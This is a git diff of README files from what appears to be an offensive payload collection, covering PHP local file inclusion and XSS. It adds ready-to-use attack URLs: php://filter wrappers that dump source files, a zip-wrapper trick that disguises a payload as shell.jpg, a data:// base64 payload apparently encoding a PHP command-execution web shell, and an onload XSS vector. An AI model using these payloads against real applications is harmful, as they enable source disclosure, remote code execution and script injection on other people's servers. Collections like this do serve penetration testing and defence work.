diff --git a/PHP include/README.md b/PHP include/README.md index 2e95014..4ff991e 100644 --- a/PHP include/README.md +++ b/PHP include/README.md @@ -13,15 +13,15 @@ http://example.com/index.php?page=%252e%252e%252f LFI Wrapper rot13 and base64 ``` -php://filter/read=string.rot13/resource= -php://filter/convert.base64-encode/resource= +http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php +http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php ``` LFI Wrapper zip ```python os.system("echo \"\" > payload.php; zip payload.zip payload.php; mv payload.zip shell.jpg; rm payload.php") -zip://shell.jpg%23payload.php +http://example.com/index.php?page=zip://shell.jpg%23payload.php ``` @@ -31,9 +31,9 @@ http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbW ``` -XSS via RFI/LFI with "" payload +XSS via RFI/LFI with "onload=alert(1)>" payload ``` -data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+ +http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+ ``` ## Thanks to diff --git a/XSS injection/README.md b/XSS injection/README.md index 23324c0..8dc0918 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -53,6 +53,7 @@ XSS for HTML5